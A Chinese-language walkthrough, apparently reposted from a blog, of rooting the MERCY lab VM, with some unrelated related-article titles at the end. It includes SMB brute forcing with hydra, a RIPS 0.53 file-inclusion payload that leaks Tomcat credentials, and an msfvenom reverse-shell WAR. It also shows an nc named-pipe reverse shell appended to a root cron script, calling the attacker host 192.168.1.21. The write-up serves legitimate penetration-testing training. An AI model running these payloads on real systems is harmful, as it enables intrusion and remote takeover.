digitalworld.local: MERCY靶机入侵
0x01 前言
MERCY是一个致力于PWK课程安全的靶机系统。MERCY是一款游戏名称,与易受攻击的靶机名称无关。本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息
靶机的下载地址:
https://drive.google.com/uc?id=1YzsW1lCKjo_WEr6Pk511DXQBFyMMR14y&export=download(注意确认下载镜像中MERCY.mf的sha256值是否正确)
0x02 信息收集
1.存活主机扫描
root@kali2018:~#arp-scan -l
发现192.168.1.12就是目标靶机系统
2.端口扫描
通过NAMP对目标靶机进行端口扫描
root@kali2018:~# nmap -A192.168.1.12Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 09:55 EST Nmap scan report for 192.168.1.12Host is up (0.00091s latency).Not shown: 990 closed portsPORT STATESERVICE VERSION22/tcp filtered ssh53/tcp opendomain ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)| dns-nsid:|_ bind.version: 9.9.5-3ubuntu0.17-Ubuntu80/tcp filtered http110/tcp openpop3?139/tcp opennetbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)143/tcp openimap Dovecot imapd|_ssl-date: TLS randomness does not represent time445/tcp opennetbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)993/tcp openssl/imap Dovecot imapd|_imap-capabilities: CAPABILITY| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server| Not valid before: 2018-08-24T13:22:55|_Not valid after: 2028-08-23T13:22:55|_ssl-date: TLS randomness does not represent time995/tcp openssl/pop3s?| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server| Not valid before: 2018-08-24T13:22:55|_Not valid after: 2028-08-23T13:22:55|_ssl-date: TLS randomness does not represent time8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1| http-methods:|_ Potentially risky methods: PUT DELETE|_http-open-proxy: Proxy might be redirecting requests|_http-server-header: Apache-Coyote/1.1|_http-title: Apache TomcatMAC Address: 00:0C:29:91:A0:C6 (VMware)Device type: general purposeRunning: Linux 3.X|4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2 - 4.9Network Distance: 1 hopService Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)| smb-os-discovery:| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)| Computer name: mercy| NetBIOS computer name: MERCY\x00| Domain name: \x00| FQDN: mercy|_ System time: 2019-02-12T22:57:54+08:00| smb-security-mode:| account_used: guest| authentication_level: user| challenge_response: supported|_ message_signing: disabled (dangerous, but default)| smb2-security-mode:| 2.02:|_ Message signing enabled but not required| smb2-time:| date: 2019-02-12 09:57:54|_ start_date: N/ATRACEROUTEHOP RTT ADDRESS1 0.91 ms 192.168.1.12OS and Service detection performed. Please report any incorrec
发现目标端口445,8080等端口开放.其他如22,80被防火墙阻断.其中samba服务已开启(这是本文重点渗透目标)
0x03漏洞利用
无论在任何情况下,我们首先攻击的应用目标是Apache
Tomcat(http://192.168.1.12:8080/)
尝试访问tomcat后台管理页面,但需要输入正确的用户名和密码方可登陆。尝试输入各种已知的信息但还是无法进入。注意到其用户的配置信息在/etc/tomcat7/tomcat-users.xml中。
1.Samba漏洞攻击
通过smbclient命令列出目标靶机中可用的Samba服务共享名.
root@kali2018:~# smbclient -NL 192.168.1.12
可从上图中看到共享的几个名称,下面将挂载其共享目录到本地,但还是不允许访问目标共享,这里需身份认证。
root@kali2018:~# mkdir /mnt/fileroot@kali2018:~# mount -tcifs 192.168.1.12:/qiu /mnt/file
2.enum4linux枚举Samba账号
root@kali2018:~# enum4linux -U -o 192.168.1.12
让我们将枚举出来的账号(qiu和pleadformercy)添加到mercy.txt中,并对其账号进行爆破。
3.samba账号爆破
root@kali2018:~#hydra -L mercy.txt -P/usr/share/wordlists/fasttrack.txt smb://192.168.1.12:139
可发现成功爆破出qiu的账号,密码为空
4.mount命令挂载目录
root@kali2018:~#mount -t cifs//192.168.1.12:/qiu/mnt/file -o username=qiu
列出挂载目录下的文件信息
5.private目录信息收集
发现.private目录提供了一些重要系统信息
root@kali2018:~# cd /mnt/file/root@kali2018:/mnt/file# cd .privateroot@kali2018:/mnt/file/.private# lsopensesame readme.txtsecretsroot@kali2018:/mnt/file/.private# cd opensesame/root@kali2018:/mnt/file/.private/opensesame# lsconfig configprint root@kali2018:/mnt/file/.private/opensesame# head -30 configHere are settings for your perusal.Port Knocking Daemon Configuration[options]UseSyslog[openHTTP]sequence = 159,27391,4seq_timeout = 100command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPTtcpflags = syn[closeHTTP]sequence = 4,27391,159seq_timeout = 100command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPTtcpflags = syn[openSSH]sequence = 17301,28504,9999seq_timeout = 100command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPTtcpflags = syn[closeSSH]sequence = 9999,28504,17301seq_timeout = 100command = /sbin/iptables -D iNPUT -s %IP% -p tcp --dport 22 -j ACCEPTtcpflags = syn
上面显示了端口启动守护进程的防火墙端口开放的命令配置.
6.打开目标靶机防火墙端口
看到两组sequence,一组用于HTTP,另一组用于SSH。
(1)http的sequence脚本:
kncok.sh
#!/bin/bashfor PORT in 159 27391 4;do nmap -Pn 192.168.1.12 -p $PORT;done
(2)SSH的sequence脚本:
kncok1.sh
#!/bin/bashfor PORT in 17301 28504 9999;do nmap -Pn 192.168.1.12 -p $PORT;done
(3)通过sequence脚本来打开HTTP的端口
root@kali2018:~# ./knoch.shStarting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:50 EST Nmap scan report for 192.168.1.12Host is up (0.00044s latency).PORT STATESERVICE159/tcp closed nss-routingMAC Address: 00:0C:29:91:A0:C6 (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.24 secondsStarting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:50 EST Nmap scan report for 192.168.1.12Host is up (0.00053s latency).PORT STATE SERVICE27391/tcp closed unknownMAC Address: 00:0C:29:91:A0:C6 (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.23 secondsStarting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:50 EST Nmap scan report for 192.168.1.12Host is up (0.00042s latency).PORT STATESERVICE4/tcp closed unknownMAC Address: 00:0C:29:91:A0:C6 (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
(4)通过sequence脚本来打开SSH的端口
root@kali2018:~# ./knoch1.shStarting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:58 EST Nmap scan report for 192.168.1.12Host is up (0.00049s latency).PORT STATESERVICE17301/tcp closed unknownMAC Address: 00:0C:29:91:A0:C6 (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.26 secondsStarting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:58 EST Nmap scan report for 192.168.1.12Host is up (0.00042s latency).PORT STATESERVICE28504/tcp closed unknownMAC Address: 00:0C:29:91:A0:C6 (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.28 secondsStarting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:58 EST Nmap scan report for 192.168.1.12Host is up (0.00031s latency).PORT STATESERVICE9999/tcp closed abyssMAC Address: 00:0C:29:91:A0:C6 (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
通过以上命令开放了80和22端口,现在在kali系统下打开80端口网站。
7.目录扫描
通过目录工具dirb对目标靶机系统80端口网站进行扫描,发现存在robots.txt文件
root@kali2018:~# dirb http://192.168.1.12
打开robots.txt的连接地址,发现一个有趣的目录/omercy
打开该目录网站,可发现RIPS 0.53版本存在
8.RIPS漏洞收集
根据EDB-ID 18660,RIPS 0.53易受本地文件包含(LFI)漏洞影响。(RIPS 0.53 LFI)
在 exploit-db 中搜索RIPS 0.53 漏洞。
https://www.exploit-db.com/exploits/18660
其PoC为:
http://localhost/rips/windows/code.php?file=../../../../../../etc/passwd
可以本地文件包含读出目标靶机的/etc/passwd的信息。
9.tomcat再次入侵
通过rips的lfi漏洞来本地包含tomcat-users.xml读取其配置信息。
http://192.168.1.12/nomercy/windows/code.php?file=./../../../../..//etc/tomcat7/tomcat-users.xml
此文件泄露了8080端口上运行的tomcat管理后台的用户名和密码信息
<? <user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/><? <user username="qiu" password="mercyplz" roles="manager-gui"/>
有了登录凭证,现在可以登录管理器的webapp来部署恶意webapp,这是一个允许反弹shell的WAR文件。
登陆到管理后台:
http://192.168.1.12:8080/manager/html
目标靶机系统为32位的ubuntu系统
我们可以通过msfvenom命令来生成这样的war包
root@kali2018:/opt# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.21 LPORT=3333 -f war -o shell.war
部署webapp后门文件shell.war
通过7z命令查看war包的内容,可以看到包含了yillzdtgvccxzwp.jsp文件
root@kali2018:/opt# 7z l shell.war
访问恶意Web应用程序,请在浏览器的地址栏中输入以下内容:
http://192.168.1.12:8080/shell/yillzdtgvccxzwp.jsp
在攻击机上执行nc监听反弹命令并使用python生成交互式的shell:python -c ‘import pty; pty.spawn(“/bin/sh”)’
root@kali2018:/opt# nc -lvvp 3333
以普通用户权限下查看其falg信息:
tomcat7@MERCY:/$ cat local.txtcat local.txtPlz have mercy on me! :-( :-(tomcat7@MERCY:/$
0x04 权限提升
可以通过从tomcat-users.xml中搜索到登录帐户qiu。在信息收集的同时还发现了将权限提升为root的方法。有一个脚本/home/qiu/.private/secrets/timeclock将每隔三分钟,以root权限运行并写入到目录/var/www/html/time中。
tomcat7@MERCY:/$su qiu qiu@MERCY:~/.private/secrets$ ls -al/home/qiu/.private/secrets/timeclockls -al /home/qiu/.private/secrets/timeclock-rwxrwxrwx 1 root root 222 Aug 31 00:47 /home/qiu/.private/secrets/timeclockqiu@MERCY:~/.private/secrets$ cat timeclock#!/bin/bashnow=$(date)echo "The system time is: $now." > ../../../../../var/www/html/timeecho "Time check courtesy of LINUX" >> ../../../../../var/www/html/timechown www-data:www-data ../../../../../var/www/html/time
将以下命令添加到脚本timclock中,其中NC监听的IP地址为攻击机(kali)的IP地址。
qiu@MERCY:~/.private/secrets$ echo "rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 192.168.1.21 5555 1>/tmp/p" >> timeclock<mp/p | nc 192.168.1.21 5555 1>/tmp/p" >> timeclock qiu@MERCY:~/.private/secrets$ cat timeclockcat timeclock#!/bin/bashnow=$(date)echo "The system time is: $now." > ../../../../../var/www/html/timeecho "Time check courtesy of LINUX" >> ../../../../../var/www/html/timechown www-data:www-data ../../../../../var/www/html/timerm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 192.168.1.21 5555 1>/tmp/p
设置另一个nc监听,监听端口为5555,3分钟后将反弹到目标root shell.并在攻击机上执行nc监听反弹命令并使用python生成交互式的shell:python -c ‘import pty; pty.spawn(“/bin/sh”)’
root@kali2018:/mnt/file/.private/opensesame# nc -lvvp 5555listening on [any] 5555 ...192.168.1.12: inverse host lookup failed: Unknown hostconnect to [192.168.1.21] from (UNKNOWN) [192.168.1.12] 39346python -c "import pty;pty.spawn('/bin/bash')"
0x05 flag信息查看
进入到root目录然后查看proof.txt得到flag信息
r
oot@MERCY:~# cd /rootcd /rootroot@MERCY:~# lslsauthor-secret.txt configproof.txtroot@MERCY:~# cat proof.txtcat proof.txtCongratulations on rooting MERCY. :-)root@MERCY:~#
转载于:https://www.cnblogs.com/backlion/p/10368920.html
digitalworld.local: MERCY靶机入侵相关推荐
- Vulnhub:Digitalworld.local (Mercy v2)靶机
kali:192.168.111.111 靶机:192.168.111.130 信息收集 端口扫描 nmap -A -v -sV -T5 -p- --script=http-enum 192.168. ...
- OSCP练习:vulhub靶机DIGITALWORLD.LOCAL: MERCY v2
nmap扫下端口 nmap -sS -sV 192.168.8.144 发现22.80是关的,应该需要敲门 8080是tomcat页面,但是manager没密码控制台进不去, 提示主机管理器 Web ...
- vulnhub - digitalworld.local: MERCY v2 (考点:信息搜集 smb 端口敲门 RIPS tomcat linux 提权)
https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap ...
- Vulnhub:Digitalworld.local (Development)靶机
kali:192.168.111.111 靶机:192.168.111.130 信息收集 端口扫描 nmap -A -v -sV -T5 -p- --script=http-enum 192.168. ...
- VulnHub1:Jangow: 1.0.1靶机入侵
VulnHub1:Jangow: 1.0.1靶机入侵 信息搜集: 扫描端口 发现命令执行漏洞 uname 一句话木马 上蚁剑 提权 方法1 方法2 VulnHub1:Jangow: 1.0.1靶机入侵 ...
- Moonraker:1靶机入侵
0x01 前言 攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息. Moonraker: 1镜像下载地址: htt ...
- 渗透测试实战3——bulldog2靶机入侵
一.实验环境 Kali攻击机:192.168.247.149 bulldog 2靶机:192.168.247.150.(192.168.247.151) 开始之前,需先登录bulldog2.账号:di ...
- 靶机渗透练习56-digitalworld.local:TORMENT
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-torment,299/ Description This is the evil ...
- 靶机渗透练习53-digitalworld.local:BRAVERY
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/ Description This machine hope ...
最新文章
- android应用去掉状态栏_Android 显示、隐藏状态栏和导航栏
- 远程安装oracle 10.2.1 for redhat 5.0 2.6.18-53.el5xen
- android:theme.holo.light.,Android: Theme.Holo.Light.NoActionBar vs Theme.Light.NoTitleBar
- 错误:由于系统启用了内核调试器,因此不可能进行调试解决方案
- 一些常用的IHTMLXX接口
- 格式说明_现代诗歌的写作格式是什么,能否举例说明?
- Hadoop分布式集群安装配置
- Java获取并Kill系统进程
- 将jpg文件当作php文件来解析,解析漏洞
- shell之for循环使用---更新中
- 【zabbix系列】报警系统的设置和排除
- 对Spring的IoC和DI最生动的解释
- PHP的HashTable实现
- 【Hive】Hive的三种交互方式
- Java StringBuilder
- iOS开发 - OC - 苹果为大家提供的后台:CloudKit 的简单使用
- ios:uibutton 中title 和image 共存那点事
- 程序员的你不可不知的数据库northwind
- 三、电容屏原理(2)
- pyhon实现excel的转置